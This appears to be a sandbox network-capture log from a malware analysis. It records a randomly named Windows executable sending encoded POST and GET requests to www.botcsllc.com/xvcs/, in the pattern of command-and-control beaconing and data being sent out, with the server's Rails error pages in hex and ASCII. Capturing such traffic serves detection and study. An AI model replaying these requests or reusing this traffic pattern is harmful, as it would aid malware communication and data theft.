                                  May 27, 2024 12:37:12.848968983 CEST1236INData Raw: 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22
                                  Data Ascii: ef="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type
                                  May 27, 2024 12:37:12.853878975 CEST1236INData Raw: 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 75 72 72 65 6e 74 53 6f 75 72 63 65 20 3d 20 65 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20
                                  Data Ascii: ); currentSource = el; } } } </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  50192.168.2.749761216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:14.857673883 CEST768OUTPOST /xvcs/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.botcsllc.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.botcsllc.com/xvcs/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 50 2f 67 59 2f 6c 77 78 4c 68 6d 46 4c 78 6f 68 63 79 6b 75 62 39 46 47 54 42 36 36 47 75 43 79 39 46 64 43 34 64 61 4c 70 61 4e 71 2f 4a 68 43 47 6d 44 45 5a 4b 49 56 2b 58 44 55 77 4b 42 38 53 55 74 2f 32 39 70 67 45 6e 39 78 71 41 52 4a 76 67 49 44 70 42 6d 64 68 62 4a 66 44 66 64 6a 32 6f 41 48 4b 57 75 54 30 4b 53 76 43 72 75 78 4d 36 48 70 76 2f 6c 44 57 38 73 65 33 6d 37 50 54 65 41 52 44 6c 6c 65 56 43 36 56 2b 32 70 73 6b 52 48 51 57 71 4e 52 34 68 71 37 4b 34 6b 57 79 4e 43 71 79 36 46 59 50 63 4a 6e 5a 44 6b 62 4f 61 63 6d 67 36 30 56 4d 53 72 42 4d 4f 77 33 58 73 4a 76 33 46 67 49 67 64 41 72 6c 4d 50 75 33 61 71 32 2f 31 31 50 62 33 49 72 59 69 38 6e 34 36 55 54 7a 4b 63 3d
                                  Data Ascii: 4h=P/gY/lwxLhmFLxohcykub9FGTB66GuCy9FdC4daLpaNq/JhCGmDEZKIV+XDUwKB8SUt/29pgEn9xqARJvgIDpBmdhbJfDfdj2oAHKWuT0KSvCruxM6Hpv/lDW8se3m7PTeARDlleVC6V+2pskRHQWqNR4hq7K4kWyNCqy6FYPcJnZDkbOacmg60VMSrBMOw3XsJv3FgIgdArlMPu3aq2/11Pb3IrYi8n46UTzKc=
                                  May 27, 2024 12:37:15.391094923 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: f72fe0f9-86e2-472b-a04f-c43667e0c781
                                  x-runtime: 0.053112
                                  content-length: 18223
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:37:15.391124964 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 27, 2024 12:37:15.391149998 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 27, 2024 12:37:15.391164064 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 27, 2024 12:37:15.391177893 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 27, 2024 12:37:15.391192913 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 27, 2024 12:37:15.391206026 CEST1236INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                  Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                  May 27, 2024 12:37:15.391217947 CEST1236INData Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                  Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                  May 27, 2024 12:37:15.391232967 CEST1236INData Raw: 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65
                                  Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                  May 27, 2024 12:37:15.391244888 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74 3b 0a 20 20 20 20 20 20 20 20 76 61
                                  Data Ascii: unction(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); }
                                  May 27, 2024 12:37:15.396152020 CEST672INData Raw: 20 61 62 73 6f 6c 75 74 65 20 55 52 4c 20 28 77 69 74 68 20 74 68 65 20 68 74 74 70 20 61 6e 64 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 55 72 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 0a
                                  Data Ascii: absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  51192.168.2.749762216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:17.382560968 CEST1781OUTPOST /xvcs/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.botcsllc.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.botcsllc.com/xvcs/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 50 2f 67 59 2f 6c 77 78 4c 68 6d 46 4c 78 6f 68 63 79 6b 75 62 39 46 47 54 42 36 36 47 75 43 79 39 46 64 43 34 64 61 4c 70 61 46 71 2b 36 35 43 55 56 72 45 61 4b 49 56 68 6e 44 52 77 4b 42 74 53 55 6c 37 32 39 6c 61 45 6c 31 78 70 69 5a 4a 2b 68 49 44 77 52 6d 64 6f 37 4a 61 4f 2f 64 4d 32 6f 51 39 4b 58 65 54 30 4b 53 76 43 71 2b 78 4d 72 48 70 74 2f 6c 41 54 38 73 43 39 47 37 7a 54 65 59 6e 44 6c 52 4f 56 54 61 56 2b 58 5a 73 6d 43 2f 51 65 71 4e 70 2f 68 71 6a 4b 34 6f 67 79 4c 6d 59 79 36 78 69 50 63 42 6e 59 56 64 71 56 34 67 53 68 35 6f 4f 4b 67 37 41 62 50 49 78 64 66 78 46 79 6e 6b 49 75 75 4d 73 6a 73 44 67 7a 39 44 50 6e 31 31 47 44 46 63 30 54 44 70 74 37 61 55 34 6e 74 6e 73 68 44 5a 48 55 66 5a 66 46 65 36 34 61 71 7a 36 42 45 43 35 39 30 2b 69 43 76 52 74 4b 46 4c 6a 7a 31 76 54 36 61 72 31 2b 72 7a 75 5a 68 53 34 46 69 33 75 30 44 63 30 73 2f 4e 54 62 30 39 36 55 38 73 31 4b 35 7a 42 67 38 4e 34 44 7a 7a 6b 56 75 54 61 68 42 4e 6e 2f 38 54 56 6c 5a 44 66 66 54 2b 38 32 33 54 [TRUNCATED]
                                  Data Ascii: 4h=P/gY/lwxLhmFLxohcykub9FGTB66GuCy9FdC4daLpaFq+65CUVrEaKIVhnDRwKBtSUl729laEl1xpiZJ+hIDwRmdo7JaO/dM2oQ9KXeT0KSvCq+xMrHpt/lAT8sC9G7zTeYnDlROVTaV+XZsmC/QeqNp/hqjK4ogyLmYy6xiPcBnYVdqV4gSh5oOKg7AbPIxdfxFynkIuuMsjsDgz9DPn11GDFc0TDpt7aU4ntnshDZHUfZfFe64aqz6BEC590+iCvRtKFLjz1vT6ar1+rzuZhS4Fi3u0Dc0s/NTb096U8s1K5zBg8N4DzzkVuTahBNn/8TVlZDffT+823TPY4mAYuFz9/sgX4dU249BRH3DbAceUst/ICtPXGqw+H6zQ5ebJiC0yCOYKAOidOODS7fv4i3sgYq0/oWUhmJnhJlW7ZoZrKO664augXYTflOkqRTu66GiPn1/jXk13W9SIi8IgyULlOqeEHaE1B1h2CjjuFsom2sn3FN/7kdfdHqM3XmdKsEj1Q9fMyPwXuPTrTMowvVqBfAaV0R6DuHaAfjjQ6D53Nng+fZWd4t/bghYjmgYqdW9UBrWBlF2xbJysduKrZhOXuduJXJnP9MXpdbQrXuqkq+D4Bo9LSFBJjhCTSiFu98glawsJzR39ffd47QIq1iZEjf+cY5QPlaSvBNFhijQRWhgHnc5RKlMVhMEgWyZ0cyzEiLE9QhOD0EHz080ZhMzAznE8ynlg7qrsNAqwHYT0EcEXjkbbClYE+XiLNPIbZJfjx8RLbMmpgA1Nlh3qnkBe/a+wKmVBTKDI4TZcgHhFkmmqhHM0S+p5MZPAx0uk2nrmyGrv5X5tlAkoaa7bLIeGLd7vweVH/icWNfVIIsW615sntmtlZGmvIh1HIMvn6ad2MI4k4+WIq3VsZh/ndo5CBabHbxsfzmlWNLrVcGk4MLa/mB8etK1n5uxJQ5BDGp641dr3JTrCQa7F+pEdUQkz9KdSMnvHBd9cOCYO9fK+NA1J [TRUNCATED]
                                  May 27, 2024 12:37:17.893853903 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: f2e0e0ec-15a0-4978-b37b-d5884e64b2a4
                                  x-runtime: 0.021172
                                  content-length: 19235
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:37:17.893867016 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 27, 2024 12:37:17.893887997 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 27, 2024 12:37:17.893901110 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 27, 2024 12:37:17.893918037 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 27, 2024 12:37:17.893927097 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 27, 2024 12:37:17.893945932 CEST1236INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                  Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                  May 27, 2024 12:37:17.893964052 CEST1236INData Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                  Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                  May 27, 2024 12:37:17.893978119 CEST1236INData Raw: 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65
                                  Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                  May 27, 2024 12:37:17.893995047 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74 3b 0a 20 20 20 20 20 20 20 20 76 61
                                  Data Ascii: unction(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); }
                                  May 27, 2024 12:37:17.899312973 CEST672INData Raw: 20 61 62 73 6f 6c 75 74 65 20 55 52 4c 20 28 77 69 74 68 20 74 68 65 20 68 74 74 70 20 61 6e 64 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 55 72 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 0a
                                  Data Ascii: absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  52192.168.2.749763216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:21.241363049 CEST487OUTGET /xvcs/?4h=C9I48TAnIDWUJjArfDMWJdViUh6nNPGow05e1uC1tfhZsbhFFmHmX4wCjHXOtJR+EmF88tR6GQ9yogFnvhAEpy/ktKFnGfRg/4wLMWSu7Ir3MPWPBJr4ouRSVqpeqHbqcPt/HmBjByDG&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:21.735172033 CEST1236INHTTP/1.1 200 OK
                                  x-frame-options: SAMEORIGIN
                                  x-xss-protection: 1; mode=block
                                  x-content-type-options: nosniff
                                  x-download-options: noopen
                                  x-permitted-cross-domain-policies: none
                                  referrer-policy: strict-origin-when-cross-origin
                                  content-type: text/html; charset=utf-8
                                  etag: W/"716ddccefe706082230daa01e9261cc7"
                                  cache-control: max-age=0, private, must-revalidate
                                  x-request-id: 36fdb5af-11c3-422b-bdcf-c09c93a5d5d1
                                  x-runtime: 0.004403
                                  transfer-encoding: chunked
                                  connection: close
                                  Data Raw: 31 37 44 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 